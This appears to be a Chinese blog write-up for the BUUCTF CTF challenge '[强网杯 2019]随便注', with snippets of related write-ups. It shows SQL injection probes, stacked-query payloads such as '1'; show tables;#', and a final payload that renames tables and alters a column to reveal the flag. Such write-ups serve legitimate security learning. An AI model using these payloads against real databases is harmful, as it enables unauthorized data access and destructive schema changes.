buuctf [强网杯 2019]随便注

最新推荐文章于 2024-08-09 21:25:57 发布
最新推荐文章于 2024-08-09 21:25:57 发布
阅读量159 收藏
点赞数
分类专栏: buu 文章标签: 数据库
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_51325053/article/details/126920384
版权

打开:
在这里插入图片描述
判断是数字型注入还是字符型注入:
在这里插入图片描述
2-1查询不同,可知非数字型
在这里插入图片描述
1和1a的查询效果一致,判断是字符型注入,sql语句中对查询的id应该是用单引号’包起来的。
比如,select id from xx where id = '1';
输入select,回显发现有关键字绕过!
在这里插入图片描述
那么联合查询,报错注入,布尔,时间盲注都无法使用了,我们还剩下堆叠注入。

先尝试使用堆叠注入:
1.1’ show tables;#
在这里插入图片描述

发现有两张表。
2.

1’; show columns from words;#
(words用`号包裹)

在这里插入图片描述

0’; show columns from 1919810931114514;#
(同样用`包裹)

在这里插入图片描述
只查到了一个表flag
3. 我们可以得知原sql语句,应该是查words表的id和data。
select id,data from words where id =
在这里插入图片描述
所以接下来我们应该如何查1919810931114514表的flag属性呢???
思路:

  1. 将word表改成word2
  2. 将1919810931114514表改成word表
  3. 将属性名flag改成id,然后用1’ or 1=1;# 显示flag出来
    payload:
1';rename table `words` to word2;
rename table `1919810931114514` to words;
alter table words change flag id varchar(100);

改完后,再查,即可获得flag

XUYsusuj
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
BUUCTF】web之强网杯2019随便
12-14
开始入: 1’ : 报错 ...# 这里意表名为数字的要加反引号 “ :在网上百度发现 得到 一个带有flag的字段 和 另一个 可查询的表 flag表:可查询表: 到这里虽然发现flag 但是select已经被ban了所
BUUCTF逆向前八题
01-24
在本篇中,我们将探讨在BUUCTF储备赛中遇到的前八道逆向题目,通过这些题目来学习如何使用逆向工具,如exeinfo和IDA,以及如何解析汇编代码以获取关键信息。 1. Easyre: 这道题首先使用exeinfo查看文件信息,确认...
BUUCTF [强网杯 2019]随便
m0_63253040的博客
03-28 799
这题和[SUCTF 2019]EasySQL类似,都可以使用堆叠入 参考wp 用1' or 1=1#可以爆出所有表内容 先尝试联合查询入 过滤了select,where等等,使用堆叠入 再看表 看下1919810931114514表 发现flag在里面,但是没办法查询,先看看word表 可以看见有字段id和data,这里应猜测查询语句 selsect id,data from words where id = 根据查询语句来改掉字段的名字 ...
【web | CTF】BUUCTF [强网杯 2019]随便
weixin_46301214的博客
03-09 495
2. 利用现成的select语句进行查询,先改当前表名为flag的表名,然后再改字段,再展示。然后试试叠堆入,其实叠堆入的这种题目出现很少,毕竟实际上只能运行一条sql语句的。发现这个表只有一个字段,就写着flag,那我们读取这个数据库的这个表的这列就可以了。先探测一下是不是单引号闭合,其实我一开始以为是没有引号闭合的,毕竟是数字。` ` 反引号据说是无敌的,具体原理我研究了一下也不敢确定,就不写了。测试了一下,发现的确是叠堆入,所有的数据库都爆出来了。这里有神奇的一幕,就是要用反引号以及-- q。
BUUCTF_[强网杯 2019]随便
qq_45628145的博客
04-25 588
BUUCTF_[强网杯 2019]随便 进入题目环境 进去之后输入框就有一个1,提交。 这里可以看到查询出了1和hahahah。 判断有没有入点 输入1’,报错了。 输入1’ and 1=1 #,查询结果和1一样。 输入1’ and 1=2 #,无回显,因此,判断这里存在入点。 输入1’ or 1=1#,得到了这个表里面的所有内容。 开始入 可以看到上面查询结果有1和hahah...
buuctf 2019强网杯 随便
devilare的博客
09-26 340
2019强网杯 随便 来到页面发现只是一个提交栏 随意试一下输入1’有回显说明存在sql入,输入万能密码试试1’ or 1=1;#输入1’; union select;#看看能否联合查询一下存在过滤,且没办法通过大小写绕过,好难,看看wp。看来需要堆叠入(ps:堆叠入就是一次性执行多条查询语句) 输入1’;show databases;#查看所有的数据库;en。。。没有和flag有关的字样,再输入1’;show tables;#看看表 ...
buuctf [强网杯 2019]随便 1
weixin_45642610的博客
01-07 1万+
buuctf web [强网杯 2019]随便 1 -刷题个人日记 小白一个,写给自己看。 打开后是这样。 从题目和内容来看就是一道sql入题。 输入 1' or 1=1;# 这个#用来释掉后面的sql语句 显示所有数据,这个数据有什么用我也不知道,但sql入一般第一步就是这样看看有没有有用的信息(没有)。 输入 1' order by 2;# 1' order by 3;# 到第3列报错,说明只显示两列。 输入1'; show tables;# 可以看到有 191981093
BUUCTF-PWN-[ZJCTF 2019]Login
07-10
BUUCTF-PWN-[ZJCTF 2019]Login
BasicASM.s(BUUCTF
06-04
分析过程文件
2020网鼎杯青龙组Boom
05-12
【标题】"2020网鼎杯青龙组Boom" 涉及的是一个网络安全竞赛的场景,其中"网鼎杯"是中国国内知名的网络安全技术大赛,旨在提升参赛者的网络安全技能和应急处理能力。"青龙组"可能是比赛中的一个分组或者阶段,可能...
BUUCTF&[强网杯 2019]随便(细节详解WP)
Pysnow's Blog
12-09 4221
这道题通过大佬的讲解,终于把其中一些细节操作的原理给理解了一遍,我们看别人的题解,跟要知道这个题解中每一操作的原理,这对我们的提升有非常的作业
BUUCTF刷题记录】[强网杯 2019]随便
m0_60911102的博客
09-17 373
随便
BUUCTF[强网杯 2019]随便 的三种解法
热门推荐
qq_44657899的博客
11-27 2万+
00X01 [强网杯 2019]随便 1’ or 1=1 #
BUUCTF [强网杯 2019]随便 1(两种方法)
m0_62879498的博客
03-05 1万+
[强网杯 2019]随便 1 第一步,先判断入点的传参方式,发现是get传参。 第二步,判断闭合方式: 1’and 1=1-- q 1’and 1=2-- q 说明闭合方式为 单引号 如果输入1“and 1=1-- q 和1”and 1=2-- q 两次的回显结果一样,说明闭合方式不是 双引号 其他同理 第三步,判断是否有关键字过滤: 先直接输入: select 查看回显,发现: 发现本题过滤关键字:/select|update|delete|drop|insert|where|\.而且不区分
BUUCTF-WEB:[强网杯 2019]随便 1
_Co1a
01-24 970
题目环境:http://de044ac0-9162-4b83-b6a6-8c99ce0efe91.node3.buuoj.cn 打开环境: 尝试入: 解题思路: 1、先尝试用union联合入:第一步、测试入点(一些小tips:利用引号,and 1=1, or 1=1之类的)判断是字符型还是数字型 1' [error] 1'# [不报错,正常回显] 1' and 1=1# ...
BUUCTF-强网杯-随便
wuerror的博客
06-30 6507
引用:https://www.cnblogs.com/Mikasa-Ackerman/p/11050033.html 1‘ //首先尝试的加引号,报错了 1’ # //正常 1‘ order by 1 # //用order by 测试得到列数为2 1' union select 1,2 # //回显了过滤规则 return preg_match("/select|update|delete|d...
JDBC详细使用
最新发布
m0_73627305的博客
08-09 479
​ JDBC是一种标准,一种规则,主要作用是使用java语言操作数据库的​ JDBC这个标准中有很多的接口,接口中有很多方法。
SpringBoot依赖之Quartz Scheduler定时调度器使用MySQL存储Job
ahauedu的专栏
08-07 625
接上一篇。本篇将在 Spring Boot 项目中,使用 Quartz Scheduler 结合 MySQL 数据库来存储 Job。
seatunnel2.3.3在centos7上安装
鑫哥
08-09 822
安装前需要准备点环境,因为seatunnel是基于java开发的,因此需要先安装java,我这里使用的java1.8,可以网上搜索下java安装教程,记得配置JAVA_HOME环境变量。在安装的过程中需要用到mysql命令,因此也需要安装下MySQL环境,这里也不具体讲解了,在网上搜索安装就行。接下来就是正式安装seatunnel了,
buuctf-强网杯2019随便
09-03
buuctf-强网杯2019随便是一场2019强网杯举办的CTF比赛中的一道题目。这道题目的名称暗示着它是一个与入漏洞相关的题目。 入漏洞是一种网络安全漏洞,攻击者可以通过在用户输入的数据中入恶意代码来获取...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值